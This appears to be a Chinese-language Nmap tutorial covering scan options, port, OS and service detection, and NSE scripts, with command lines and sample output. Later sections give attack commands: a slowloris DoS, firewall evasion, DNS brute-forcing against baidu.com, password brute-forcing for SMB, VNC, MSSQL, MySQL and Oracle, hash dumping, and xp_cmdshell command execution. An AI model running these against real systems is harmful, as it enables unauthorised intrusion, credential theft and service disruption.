Nmap 是免費開放源代碼實用程序,用於網絡發現和安全審核。許多系統和網絡管理員還發現它對於諸如網絡清單,管理服務升級計划以及監視主機或服務正常運行時間之類的任務很有用。Nmap以新穎的方式使用原始IP數據包來確定網絡上可用的主機,這些主機提供的服務,它們正在運行的操作系統,包過濾器/防火牆的類型。正在使用中,還有許多其他特性。它旨在快速掃描大型網絡,但可以在單個主機上正常運行。
Nmap 主機發現掃描
主機發現有時候也叫做 Ping 掃描,但它遠遠超越用世人皆知的 Ping 工具發送簡單的 IcMp 回聲請求報文,這些探測的目的是獲得響應以顯示某個 lP 地址是否是活動的(正在被某主機或者網絡設備使用).主機發現能夠找到零星分布於 lP 地址海洋上的那些機器.
Nmap 命令參數解析 掃描之前先來看一下參數解析.
-sT TCP connect() 掃描,這是最基本的 TCP 掃描方式。這種掃描很容易被檢測到,在目標主機的日志中會記錄大批的連接請求以及錯誤信息。
-sS TCP 同步掃描 (TCP SYN),因為不必全部打開一個 TCP 連接,所以這項技術通常稱為半開掃描 (half-open)。這項技術最大的好處是,很少有系統能夠把這記入系統日志。不過,你需要 root 權限來定制 SYN 數據包。
-sF,-sX,-sN 秘密 FIN 數據包掃描、聖誕樹 (Xmas Tree)、空 (Null) 掃描模式。這些掃描方式的理論依據是:關閉的端口需要對你的探測包回應 RST 包,而打開的端口必需忽略有問題的包(參考 RFC 793 第 64 頁)。
-sP ping 掃描,用 ping 方式檢查網絡上哪些主機正在運行。當主機阻塞 ICMP echo 請求包是 ping 掃描是無效的。nmap 在任何情況下都會進行 ping 掃描,只有目標主機處於運行狀態,才會進行后續的掃描。
-sU UDP 的數據包進行掃描,如果你想知道在某台主機上提供哪些 UDP(用戶數據報協議,RFC768) 服務,可以使用此選項。
-sA ACK 掃描,這項高級的掃描方法通常可以用來穿過防火牆。
-sW 滑動窗口掃描,非常類似於 ACK 的掃描。
-sR RPC 掃描,和其它不同的端口掃描方法結合使用。
-b FTP 反彈攻擊 (bounce attack),連接到防火牆后面的一台 FTP 服務器做代理,接着進行端口掃描。
-P0 在掃描之前,不 ping 主機。
-PT 掃描之前,使用 TCP ping 確定哪些主機正在運行。
-PS 對於 root 用戶,這個選項讓 nmap 使用 SYN 包而不是 ACK 包來對目標主機進行掃描。
-PI 設置這個選項,讓 nmap 使用真正的 ping(ICMP echo 請求)來掃描目標主機是否正在運行。
-PB 這是默認的 ping 掃描選項。它使用 ACK(-PT) 和 ICMP(-PI) 兩種掃描類型並行掃描。如果防火牆能夠過濾其中一種包,使用這種方法,你就能夠穿過防火牆。
-O 這個選項激活對 TCP/IP 指紋特征 (fingerprinting) 的掃描,獲得遠程主機的標志,也就是操作系統類型。
-I 打開 nmap 的反向標志掃描功能。
-f 使用碎片 IP 數據包發送 SYN、FIN、XMAS、NULL。包增加包過濾、入侵檢測系統的難度,使其無法知道你的企圖。
-v 冗余模式。強烈推薦使用這個選項,它會給出掃描過程中的詳細信息。
-S <IP> 在一些情況下,nmap 可能無法確定你的源地址 (nmap 會告訴你)。在這種情況使用這個選項給出你的 IP 地址。
-g port 設置掃描的源端口。一些天真的防火牆和包過濾器的規則集允許源端口為 DNS(53) 或者 FTP-DATA(20) 的包通過和實現連接。顯然,如果攻擊者把源端口修改為 20 或者 53,就可以摧毀防火牆的防護。
-oN 把掃描結果重定向到一個可讀的文件 logfilename 中。
-oS 掃描結果輸出到標准輸出。
--host_timeout 設置掃描一台主機的時間,以毫秒為單位。默認的情況下,沒有超時限制。
--max_rtt_timeout 設置對每次探測的等待時間,以毫秒為單位。如果超過這個時間限制就重傳或者超時。默認值是大約 9000 毫秒。
--min_rtt_timeout 設置 nmap 對每次探測至少等待你指定的時間,以毫秒為單位。
-M count 置進行 TCP connect() 掃描時,最多使用多少個套接字進行並行的掃描。
批量Ping掃描: 批量掃描一個網段的主機存活數.
[root@localhost ~]# nmap -sP 192.168.1.0/24
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 21:41 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0011s latency).
MAC Address: 44:7D:3F:07:2C:A1 (Unknown)
Nmap scan report for 192.168.1.2
Host is up (0.000095s latency).
MAC Address: FF:8E:BB:EE:AA:B4 (Unknown)
Nmap scan report for 192.168.1.3
Host is up (0.051s latency).
MAC Address: CC:C0:AC:22:DD:07 (Unknown)
Nmap scan report for 192.168.1.7
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 50.15 seconds
跳過Ping探測: 有些主機關閉了ping檢測,所以可以使用-P0跳過ping的探測,可以加快掃描速度.
[root@localhost ~]# nmap -P0 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 21:52 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
計算網段主機IP: 僅列出指定網段上的每台主機,不發送任何報文到目標主機.
[root@localhost ~]# nmap -sL 192.168.1.0/24
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 21:43 EDT
Nmap scan report for 192.168.1.0
Nmap scan report for 192.168.1.1
Nmap scan report for 192.168.1.2
Nmap scan report for 192.168.1.3
Nmap scan report for 192.168.1.4
Nmap scan report for 192.168.1.5
...省略...
Nmap done: 256 IP addresses (0 hosts up) scanned in 4.03 seconds
掃描IP地址范圍: 可以指定一個IP地址范圍
[root@localhost ~]# nmap -sP 192.168.1.1-10
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:17 EDT
Nmap scan report for 192.168.1.1
Host is up (0.00087s latency).
MAC Address: 1A:7D:2E:AC:6E:1A (Unknown)
Nmap scan report for 192.168.1.2
Host is up (0.00016s latency).
MAC Address: 81:8E:38:BC:7C:8E (Unknown)
Nmap scan report for 192.168.1.4
Host is up (0.061s latency).
MAC Address: 81:29:81:64:81:A3 (Unknown)
Nmap scan report for 192.168.1.5
Host is up (0.060s latency).
MAC Address: EA:3A:EA:EA:81:EA (Unknown)
Nmap scan report for 192.168.1.7
Host is up.
Nmap done: 10 IP addresses (5 hosts up) scanned in 0.26 seconds
探測開放端口(SYN): 探測目標主機開放的端口,可指定一個以逗號分隔的端口列表(如-PS22,443,80).
[root@localhost ~]# nmap -PS22,80,443 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:15 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0000090s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
探測開放端口(UDP): 探測目標主機開放的端口,可指定一個以逗號分隔的端口列表(如-PS22,443,80).
[root@localhost ~]# nmap -PU 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 21:55 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
SYN掃描: 使用SYN半開放掃描
[root@localhost ~]# nmap -sS 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:01 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
TCP掃描: 掃描開放了TCP端口的設備.
[root@localhost ~]# nmap -sT 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:01 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0012s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds
UDP掃描: 掃描開放了UDP端口的設備.
[root@localhost ~]# nmap -sU 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:02 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0010s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
Nmap done: 1 IP address (1 host up) scanned in 1.52 seconds
協議探測: 探測目標主機支持哪些IP協議
[root@localhost ~]# nmap -sO 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:04 EDT
Nmap scan report for 192.168.1.7
Host is up (0.000016s latency).
Not shown: 249 closed protocols
PROTOCOL STATE SERVICE
1 open icmp
2 open|filtered igmp
6 open tcp
17 open udp
103 open|filtered pim
136 open|filtered udplite
255 open|filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1.37 seconds
探測目標系統: 掃描探測目標主機操作系統,這里結果僅供參考.
[root@localhost ~]# nmap -O 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:06 EDT
Nmap scan report for 192.168.1.7
Host is up (0.000056s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 - 3.9
Network Distance: 0 hops
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds
探測服務版本: 用於掃描目標主機服務版本號.
[root@localhost ~]# nmap -sV 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:08 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0000090s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open mysql ?
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.43 seconds
掃描多台主機: 一次性掃描多台目標主機.
[root@localhost ~]# nmap 192.168.1.2 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:11 EDT
Nmap scan report for 192.168.1.2
Host is up (0.00052s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: F4:8E:38:EE:7C:B4 (Unknown)
Nmap scan report for 192.168.1.7
Host is up (0.000010s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Nmap done: 2 IP addresses (2 hosts up) scanned in 4.26 seconds
導入掃描文件: 從一個文件中導入IP地址,並進行掃描.
[root@localhost ~]# cat lyshark.log
localhost
www.baidu.com
192.168.1.7
[root@localhost ~]# nmap -iL lyshark.log
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:13 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000090s latency).
Other addresses for localhost (not scanned): 127.0.0.1
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
3306/tcp open mysql
Nmap scan report for 192.168.1.7
Host is up (0.0000090s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Nmap done: 3 IP addresses (2 hosts up) scanned in 3.09 seconds
繞過防火牆: 在掃描時通過使用-f參數以及使用--mtu 4/8/16使用分片、指定數據包的MTU,來繞過防火牆.
[root@localhost ~]# nmap -f 127.0.0.1
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 03:12 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000012s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
其他基本:
nmap localhost #查看主機當前開放的端口
nmap -p 1024-65535 localhost #查看主機端口(1024-65535)中開放的端口
nmap -PS 192.168.21.163 #探測目標主機開放的端口
nmap -PS22,80,3306 192.168.21.163 #探測所列出的目標主機端口
nmap -O 192.168.21.163 #探測目標主機操作系統類型
nmap -A 192.168.21.163 #探測目標主機操作系統類型
Nmap 使用掃描腳本
Nmap不僅用於端口掃描,服務檢測,其還具有強大的腳本功能,利用Nmap Script可以快速探測服務器,一般情況下,常用的掃描腳本會放在/usr/share/nmap/script目錄下,並且腳本擴招名為*.nse后綴的,接下來將介紹最常用的掃描腳本.
掃描WEB敏感目錄: 通過使用--script=http-enum.nse可以掃描網站的敏感目錄.
[root@localhost ~]# nmap -p 80 --script=http-enum.nse www.mkdirs.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 01:49 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000010s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
| http-enum:
| /login.php: Possible admin folder
| /robots.txt: Robots file
| /config/: Potentially interesting folder w/ directory listing
| /docs/: Potentially interesting folder w/ directory listing
| /external/: Potentially interesting folder w/ directory listing
|_ /icons/: Potentially interesting folder w/ directory listing
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds
繞開鑒權: 負責處理鑒權證書(繞開鑒權)的腳本,也可以作為檢測部分應用弱口令.
[root@localhost ~]# nmap --script=auth www.mkdirs.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:16 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000090s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Oct 30 19:45 pub
22/tcp open ssh
25/tcp open smtp
| smtp-enum-users:
|_ root
80/tcp open http
| http-domino-enum-passwords:
|_ ERROR: No valid credentials were found
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds
默認腳本掃描: 腳本掃描,主要是搜集各種應用服務的信息,收集到后可再針對具體服務進行攻擊.
[root@localhost ~]# nmap --script=default www.mkdirs.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:21 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000010s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Oct 30 19:45 pub
22/tcp open ssh
| ssh-hostkey: 2048 c2:89:44:fc:e3:1b:5a:65:a1:6e:11:34:73:6d:d5:04 (RSA)
|_256 54:0e:d4:47:2f:b2:d4:2b:33:b6:d8:35:66:2d:a2:aa (ECDSA)
3306/tcp open mysql
| mysql-info: Protocol: 10
| Version: 5.5.60-MariaDB
| Thread ID: 10408
| Status: Autocommit
|_Salt: <D"y]F(2
Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds
檢測常見漏洞: 通過使用--script=luln,可以掃描網站的常見漏洞,以及網頁的目錄結構.
[root@localhost ~]# nmap --script=vuln www.mkdirs.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:24 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000017s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
80/tcp open http
| http-enum:
| /login.php: Possible admin folder
| /robots.txt: Robots file
| /config/: Potentially interesting folder w/ directory listing
| /docs/: Potentially interesting folder w/ directory listing
| /external/: Potentially interesting folder w/ directory listing
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-fileupload-exploiter:
|_http-frontpage-login: false
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds
內網服務探測: 通過使用--script=broadcast,可以實現在局域網內探查更多服務開啟狀況.
[root@localhost ~]# nmap -n -p445 --script=broadcast 127.0.0.1
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:28 EDT
Pre-scan script results:
| broadcast-dhcp-discover:
| IP Offered: 192.168.1.14
| Server Identifier: 192.168.1.1
| Subnet Mask: 255.255.255.0
| Router: 192.168.1.1
|_ Domain Name Server: 192.168.1.1
| broadcast-eigrp-discovery:
|_ ERROR: Couldn't get an A.S value.
| broadcast-listener:
| ether
| ARP Request
| sender ip sender mac target ip
| 192.168.1.1 43:72:23:04:56:21 192.168.1.2
| 192.168.1.2 B4:8C:28:BE:4C:34 192.168.1.1
| EIGRP Update
........
進行WhoIS查詢: 通過使用--script whois模塊,可以查詢網站的簡單信息.
[root@localhost ~]# nmap --script whois www.baidu.com
Host script results:
| whois: Record found at whois.apnic.net
| inetnum: 61.135.0.0 - 61.135.255.255
| netname: UNICOM-BJ
| descr: China Unicom Beijing province network
| country: CN
| person: ChinaUnicom Hostmaster
|_email: hqs-ipabuse@chinaunicom.cn
Nmap done: 1 IP address (1 host up) scanned in 4.76 seconds
詳細WhoIS解析: 利用第三方的數據庫或資源,查詢詳細的WhoIS解析情況.
[root@localhost ~]# nmap --script external www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:31 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.018s latency).
|_http-robtex-shared-ns: ERROR: Script execution failed (use -d to debug)
| ip-geolocation-geoplugin:
| 61.135.169.125 (www.baidu.com)
| coordinates (lat,lon): 39.9288,116.3889
|_ state: Beijing, China
|_ip-geolocation-maxmind: ERROR: Script execution failed (use -d to debug)
| whois: Record found at whois.apnic.net
| inetnum: 61.135.0.0 - 61.135.255.255
| netname: UNICOM-BJ
| descr: China Unicom Beijing province network
|_country: CN
.....
發現內網網關: 通過使用--script=broadcast-netbios-master-browser可以發現內網網關的地址.
[root@localhost ~]# nmap --script=broadcast-netbios-master-browser 192.168.1.1
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:05 EDT
Pre-scan script results:
| broadcast-netbios-master-browser:
| ip server domain
|_192.168.1.2 Web-Server WORKGROUP
Nmap scan report for 192.168.1.1
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
80/tcp filtered http
1900/tcp open upnp
MAC Address: 42:1C:1B:E7:B1:B2 (TP-Link)
發現WEB中Robots文件: 通過使用--script=http-robots.txt.nse可以檢測到robots文件內容.
[root@localhost scripts]# nmap --script=http-robots.txt.nse www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:12 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.019s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.121
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
| http-robots.txt: 9 disallowed entries
| /baidu /s? /ulink? /link? /home/news/data/ /shifen/
|_/homepage/ /cpro /
443/tcp open https
| http-robots.txt: 9 disallowed entries
| /baidu /s? /ulink? /link? /home/news/data/ /shifen/
|_/homepage/ /cpro /
Nmap done: 1 IP address (1 host up) scanned in 5.06 seconds
檢查WEB服務器時間: 檢查web服務器的當前時間.
[root@localhost scripts]# nmap -p 443 --script http-date.nse www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:16 EDT
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.017s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT STATE SERVICE
443/tcp open https
|_http-date: Sun, 31 Mar 2019 06:16:53 GMT; 0s from local time.
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
執行DOS攻擊: dos攻擊,對於處理能力較小的站點還挺好用的.
[root@localhost ~]# nmap --script http-slowloris --max-parallelism 1000 www.mkdirs.com
Warning: Your max-parallelism (-M) option is extraordinarily high, which can hurt reliability
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:21 EDT
檢查DNS子域: 檢查目標ns服務器是否允許傳送,如果能,直接把子域拖出來就好了.
[root@localhost scripts]# nmap -p 53 --script dns-zone-transfer.nse -v www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:28 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Ping Scan at 02:28
Scanning www.baidu.com (61.135.169.121) [4 ports]
Completed Ping Scan at 02:28, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:28
Completed Parallel DNS resolution of 1 host. at 02:28, 0.01s elapsed
Initiating SYN Stealth Scan at 02:28
Scanning www.baidu.com (61.135.169.121) [1 port]
Completed SYN Stealth Scan at 02:28, 0.20s elapsed (1 total ports)
NSE: Script scanning 61.135.169.121.
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.016s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT STATE SERVICE
53/tcp filtered domain
NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Raw packets sent: 6 (240B) | Rcvd: 1 (28B)
查詢WEB旁站: 旁站查詢,ip2hosts接口該接口似乎早已停用,如果想繼續用,可自行到腳本里把接口部分的代碼改掉.
[root@localhost scripts]# nmap -p80 --script hostmap-ip2hosts.nse www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:29 EDT
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.017s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT STATE SERVICE
80/tcp open http
Host script results:
| hostmap-ip2hosts:
|_ hosts: Error: could not GET http://www.ip2hosts.com/csv.php?ip=61.135.169.121
Nmap done: 1 IP address (1 host up) scanned in 5.89 seconds
暴力破解DNS記錄: 這里以破解百度的域名為例子,由於內容較多這里簡化顯示.
[root@localhost scripts]# nmap --script=dns-brute.nse www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 03:19 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.018s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.121
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Host script results:
| dns-brute:
| DNS Brute-force hostnames
| lab.baidu.com - 180.149.144.192
| lab.baidu.com - 180.149.132.122
| corp.baidu.com - 123.129.254.12
|_ log.baidu.com - 10.26.39.14
Nmap done: 1 IP address (1 host up) scanned in 10.58 seconds
內網VNC掃描: 通過使用腳本,檢查VNC版本等一些敏感信息.
[root@localhost ~]# nmap --script=realvnc-auth-bypass 127.0.0.1 #檢查VNC版本
[root@localhost ~]# nmap --script=vnc-auth 127.0.0.1 #檢查VNC認證方式
[root@localhost ~]# nmap --script=vnc-info 127.0.0.1 #獲取VNC信息
[root@localhost ~]# nmap --script=vnc-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1 #暴力破解VNC密碼
內網SMB掃描: 檢查局域網中的Samba服務器,以及對服務器的暴力破解.
[root@localhost ~]# nmap --script=smb-brute.nse 127.0.0.1 #簡單嘗試破解SMB服務
[root@localhost ~]# nmap --script=smb-check-vulns.nse --script-args=unsafe=1 127.0.0.1 #SMB已知幾個嚴重漏
[root@localhost ~]# nmap --script=smb-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1 #通過傳遞字段文件,進行暴力破解
[root@localhost ~]# nmap -p445 -n --script=smb-psexec --script-args=smbuser=admin,smbpass=1233 127.0.0.1 #查詢主機一些敏感信息:nmap_service
[root@localhost ~]# nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1 #查看會話
[root@localhost ~]# nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1 #查看系統信息
MSSQL掃描: 檢查局域網中的SQL Server服務器,以及對服務器的暴力破解.
[root@localhost ~]# nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1 #暴力破解MSSQL密碼
[root@localhost ~]# nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa 127.0.0.1 #dumphash值
[root@localhost ~]# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4 xp_cmdshell #執行命令
MYSQL掃描: 檢查局域網中的MySQL服務器,以及對服務器的暴力破解.
[root@localhost ~]# nmap -p3306 --script=mysql-empty-password.nse 127.0.0.1 #掃描root空口令
[root@localhost ~]# nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 127.0.0.1 #列出所有用戶
[root@localhost ~]# nmap -p3306 --script=mysql-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1 #暴力破解MYSQL口令
Oracle掃描: 檢查局域網中的Oracle服務器,以及對服務器的暴力破解.
[root@localhost ~]# nmap --script=oracle-sid-brute -p 1521-1560 127.0.0.1 #oracle sid掃描
[root@localhost ~]# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 127.0.0.1 #oracle弱口令破解